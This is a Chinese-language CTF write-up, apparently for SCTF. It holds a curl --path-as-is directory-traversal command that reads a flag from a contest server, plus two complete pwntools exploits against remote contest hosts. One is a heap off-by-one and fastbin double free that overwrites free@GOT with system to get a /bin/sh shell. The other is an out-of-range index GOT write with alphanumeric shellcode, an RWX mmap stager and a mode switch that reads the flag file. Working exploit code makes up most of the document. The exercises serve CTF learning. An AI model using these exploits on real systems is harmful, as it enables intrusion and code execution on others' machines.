有师傅发现可以直接目录穿越读取 flag：`curl --path-as-is` 让客户端不对 `/tmp/../../flag` 里的 `../` 做归一化，原样交给服务端解析，于是一条命令就把 flag 读了出来：
#root@iZ8vb0cjzcdx977svsnmimZ:~/web# curl --path-as-is http://39.104.93.188/index.php/tmp/../../flag
SCTF{B3st_1angu4g3_F0r_Uohhhhhhhhhh1l1l1}
root@iZ8vb0cjzcdx977svsnmimZ:~/web#
在输入 words 的地方有一次 off-by-one 的机会：多出来的一个字节改写了下一个 chunk 的 size 低字节（脚本里写成 `\xa1`），借此构造堆块重叠；然后做两次 fastbin double free，把 fd 指向 GOT 附近的 `0x602ffa`，先借相邻的 GOT 项泄露 libc 地址，再把 `free@got` 改写成 `system`，最后 free 一个内容为 `/bin/sh` 的 chunk 拿到 shell。
exp:
from pwn import *
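# Target selection, kept in the same local/remote shape as the CoolCode exp
# further down: set local=1 to debug against the binary in the current directory.
local = 0
if local:
    p = process('./snake')
else:
    p = remote('39.107.244.116', 9999)
# Symbols and the libc pwntools resolves for the binary; libc.sym['free'] and
# libc.sym['system'] are used by the leak/overwrite below, so this libc must
# match the remote one.
elf = ELF('./snake')
libc = elf.libc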
def add(idx, size, data):
    """Menu option 1: allocate chunk `idx` of `size` bytes and fill it with `data`.

    The three numeric prompts are answered with sendline; `data` itself is sent
    raw (no trailing newline) so a full-length payload is delivered unchanged.
    """
    answers = (('name', '1'), ('?', str(idx)), ('?', str(size)))
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
    p.sendafter('?', data)
def delete(idx):
    """Menu option 2: free chunk `idx`."""
    for prompt, reply in (('name', '2'), ('?', str(idx))):
        p.sendlineafter(prompt, reply)
def get_name(idx):
    """Menu option 3: select/show chunk `idx` (used below to leak through the chunk placed in the GOT)."""
    for prompt, reply in (('name', '3'), ('?', str(idx))):
        p.sendlineafter(prompt, reply)
def start_game():
    """Menu option 4: start a round of the game."""
    choice = '4'
    p.sendlineafter('name', choice)
def if_exit(bol):
    """Answer the "exit?" prompt; `bol` is the literal reply string (e.g. 'n')."""
    prompt = 'exit?'
    p.sendlineafter(prompt, bol)
# ---- stage 0: reach the off-by-one ----
# NOTE(review): this name buffer is never add()'d but is delete(0)'d below, so
# it is presumably what the binary tracks as chunk 0 -- confirm.
p.sendlineafter('?',str(0x30))
p.sendafter('name','doudou')
# Step through the game's prompts; 36 newlines is what the author needed to
# reach the "words:" input (empirical, not derived here).
for i in range(36):
    p.send('\n')
# The off-by-one (see writeup): 0x4d bytes of "words" = 68 bytes of filler,
# 8 zero bytes, then one extra byte 0xa1 that lands on the low byte of the
# following chunk's size field, forging it to 0xa0|PREV_INUSE so that later
# allocations overlap.
p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
if_exit('n')
# ---- stage 1: carve overlapping chunks ----
add(1,0x50,'aaaa')#0x602ffa is the fastbin target used below (fixed address, so a non-PIE binary is assumed)
add(2,0x58,'aaaa')
add(3,0x50,'aaaa')
add(4,0x28,'aaaa')
delete(0)
add(0,0x30,'aaa')
add(5,0x50,'bbb')#5=2 (author's note): chunk 5 is carved out of the forged region and overlaps chunk 2
# ---- stage 2: fastbin dup -> fake chunk at 0x602ffa ----
# With the overlap, the three frees leave one 0x60 fastbin chunk in the list
# twice (the writeup's "double free"), so the next add() is handed that chunk
# and its first 8 bytes -- the fastbin fd -- are overwritten with 0x602ffa.
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'bbb')
# The fourth allocation returns the fake chunk at 0x602ffa, i.e. user data at
# 0x60300a.  0xe non-zero bytes run exactly up to 0x603018, so when the
# chunk is printed (by get_name or by the game that follows -- unclear from
# here) the output continues into the adjacent GOT entry with no NUL between.
add(6,0x50,'\x11'*0xe)
get_name(6)
start_game()
for i in range(36):
    p.send('\n')
#sleep(2)
# Leak: the first 0x7f byte in the output is taken as the top byte of the
# printed pointer, which is assumed to be free@got (hence the free
# subtraction).  This mis-parses if any earlier output happens to contain 0x7f.
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
if_exit('n')
# ---- stage 3: same fastbin dup again, this time writing system into 0x603018 ----
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'/bin/sh\x00')
# Same layout as chunk 6: 0xe filler bytes, then the 8 bytes at 0x603018
# (free@got, judging from the leak) become the address of system.
add(7,0x50,'a'*0xe+p64(system))
# free(chunk 5) now runs system("/bin/sh").
delete(5)
#p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
p.interactive()
# Only reached once the interactive session ends (Python 2 print statement).
print hex(libcbase)
这道题（斗地主）只要地主一方赢了就会给 flag。
直接开 3 个浏览器，三个座位都由自己控制一起玩，硬打到地主赢即可拿到 flag。
在 ctf.show 上好像有相同的题目，可以使用 msstv 工具（原文如此，工具名待确认）来做。
漏洞点在于申请堆块时索引没有做范围检查（脚本里用了 `-37`），得到的堆块指针可以被写到 GOT 表上，这样程序调用对应函数时就会跳到我们的 shellcode；但 shellcode 只能由数字和字母组成且长度有限制，比赛时没有绕过，赛后参考 wp 复现。
from pwn import *
# Verbose pwntools I/O logging and x86-64 assembly for the asm() calls below.
context.log_level = "debug"
context.arch = 'amd64'
# NOTE(review): loaded from "demo" while the local target is ./CoolCode;
# `elf` is not referenced again in this script, so the mismatch is harmless
# here, but fix it before relying on elf symbols.
elf = ELF("demo")
# Flip to 1 to debug against the local binary.
local = 0
p = process("./CoolCode") if local else remote("39.107.119.192", 9999)
def db():
    """Attach gdb to the live process with a breakpoint on delete()."""
    breakpoints = 'b delete'
    gdb.attach(p, breakpoints)
def choose(num):
    """Pick menu entry `num` at the main prompt."""
    reply = str(num)
    p.sendlineafter("Your choice :", reply)
def add(idx, mes):
    """Menu 1: store message `mes` at slot `idx`.

    `idx` is sent verbatim -- the exploit relies on the binary accepting a
    negative index -- and `mes` is sent raw, without a trailing newline.
    """
    choose(1)
    index_reply = str(idx)
    p.sendlineafter("Index: ", index_reply)
    p.sendafter("messages: ", mes)
def show(idx):
    """Menu 2: display the message at slot `idx`."""
    choose(2)
    index_reply = str(idx)
    p.sendlineafter("Index: ", index_reply)
def delete(idx):
    """Menu 3: free the message at slot `idx`."""
    choose(3)
    index_reply = str(idx)
    p.sendlineafter("Index: ", index_reply)
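# Address of the program's slot table (from the author's analysis); it is not
# referenced below but is the base the negative index is relative to.
chunk_list = 0x602140

# Step 1: out-of-range index.  add() does not reject a negative index, so slot
# -37 stores this chunk's pointer 37 slots before chunk_list (0x602018 if the
# slots are 8-byte pointers -- confirm), which the writeup says is a GOT entry.
# When the program later calls through that entry it lands in the message
# bytes, so the message is shellcode.  The binary only accepts digits and
# letters, hence the alphanumeric encoding.
add(-37, "SX"+"RXWZ"+"4S0BD"+"SX4045"+"0BC"+"48420BB"+"XXX" +"UX")
#db()

# The author's disassembly notes for the next payload.  The page had them
# split into one token per line; re-paired here in the order of the opcode
# bytes of "TZ32RX38SX4ZPZUX" (operands as written in the notes):
#   push rsp ; pop rdx           (T Z)
#   xor esi, DWORD PTR [edx]     (3 2)
#   push rdx ; pop rax           (R X)
#   xor edi, DWORD PTR [eax]     (3 8)
#   push rbx ; pop rax           (S X)
#   xor al, 0x5A                 (4 Z)
#   push rax ; pop rdx           (P Z)
#   push rbp ; pop rax           (U X)
#   push rsi                     (V)  -- the stray bare `rsi` line on the page
add(0, "TZ"+"32"+"RX"+"38"+"SX"+"4Z"+"PZ"+"UX")
#db()
# "RZ" = push rdx ; pop rdx (2-byte filler), "VVWX" = push rsi ; push rsi ; push rdi ; pop rax
add(1, "RZ"*7+"VVWX")#----
# NOTE(review): the page's listing interleaved the two add() calls above with
# their arguments (a SyntaxError as printed); the index/payload pairing follows
# their order on the page and should be confirmed against the original exp.

# Freeing slot 0 is what triggers the hijacked GOT call (free, presumably).
delete(0)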
# Stage 1: a small x86-64 stager sent on stdin once the alphanumeric stub is
# running (how the stub transfers control here is not visible in this script).
# It maps a fresh page and reads stage 2 into it, so stage 2 escapes the
# digits-and-letters filter entirely.
#  * mmap(0x40000000, 0x100, 7, 0x22, 0, 0): prot 7 = RWX; 0x22 is presumably
#    MAP_PRIVATE|MAP_ANONYMOUS, so fd 0 is ignored and the page is zero-filled.
#    The 4th argument goes in r10 for the syscall ABI -- the in-string comment
#    says rcx, the code is right.
#  * read(0, 0x40000000, 0x100): rax=0, rdi=0, rsi=mapping, rdx=0x100.
#  * push rsi ; ret: jump to the bytes just read.
# The address is below 4 GiB, presumably so stage 2's 32-bit code can still
# address the page after the mode switch.
shellcode_mmap = '''
/*mmap(0x40000000,0x100,7,34,0,0)*/
push 0x40000000 /*set rdi*/
pop rdi
push 0x100 /*set rsi*/
pop rsi
push 7 /*set rdx*/
pop rdx
push 0x22 /*set rcx*/
pop r10
push 0 /*set r8*/
pop r8
push 0 /*set r9*/
pop r9
push 0x9
pop rax
syscall/*syscall*/
push rdi
pop rsi
push 0
pop rax
push 0x100
pop rdx
push 0
pop rdi
syscall
push rsi
ret
'''
# sendline: the trailing newline is harmless only because the stager ends in
# `ret` and is read by the stub, not executed past its end -- assumption.
p.sendline(asm(shellcode_mmap))
# Stage 2, read to 0x40000000 by the stager above.  It is a mode-switching
# (heaven's-gate style) open/read/write of "flag": open via the 32-bit
# int 0x80 interface, then back to 64-bit for read/write.
#
# Far return to CS 0x23 (32-bit compat segment) at 0x4000000b: this stub is
# 11 bytes (2+5+1+1+2), so the target is the first byte of open_shellcode.
payload = '''
push 0x23
push 0x4000000b
pop rax
push rax
retfq
'''
# Runs in 32-bit mode but is assembled with context.arch='amd64'; the
# encodings coincide for these instructions (assumption -- verify with a
# 32-bit disassembler).  esp is moved into the RWX page because the 64-bit
# stack is not addressable from compat mode.  eax=5 is presumably i386
# sys_open; 0x67616c66 is "flag" little-endian, pushed at 0x400000fc..ff, and
# its terminating NUL is the byte at 0x40000100 -- untouched zero from the
# anonymous mapping, since the stager's read is capped at 0x100 bytes.
# ecx/edx = 0 (O_RDONLY).  The returned fd is saved in ecx but never used:
# read_shellcode below hard-codes fd 3.
open_shellcode = '''
mov esp, 0x40000100
xor ecx,ecx
xor edx,edx
mov eax,0x5
push 0x67616c66
mov ebx,esp
int 0x80
mov ecx,eax
'''
# Far return to CS 0x33 (64-bit) at 0x40000030.  In compat mode `48 CB`
# decodes as dec eax ; retf with 4-byte pops, matching the two 4-byte pushes
# (assumption).  By my count the three pieces so far total 0x2d bytes, so
# 0x40000030 lands inside the six-nop sled rather than exactly on
# read_shellcode; the sled is what makes the hard-coded target safe.
ret_64 = '''
push 0x33
push 0x40000030
retfq
nop
nop
nop
nop
nop
nop
'''
# read(3, 0x40000200, 0x100): fd 3 assumes stdin/stdout/stderr were the only
# open descriptors when open() ran (typical for a socat/xinetd service);
# a stricter version would reuse the fd saved in ecx.
read_shellcode = '''
push 0x3;
pop rdi;
push 0x0;
pop rax;
push 0x40000200
pop rsi;
push 0x100;
pop rdx;
syscall;
'''
# write(1, 0x40000200, 0x100): rsi and rdx are left over from the read
# (syscall clobbers only rcx/r11), so the full 0x100-byte buffer is written,
# not just the bytes actually read.
write_shellcode = '''
push 0x1
pop rdi
push 0x1
pop rax
syscall
'''
#db()
# Manual gate so the stager has been consumed before stage 2 is sent (Python 2).
raw_input("write flag")
p.sendline(asm(payload)+asm(open_shellcode)+asm(ret_64)+asm(read_shellcode)+asm(write_shellcode))
p.interactive()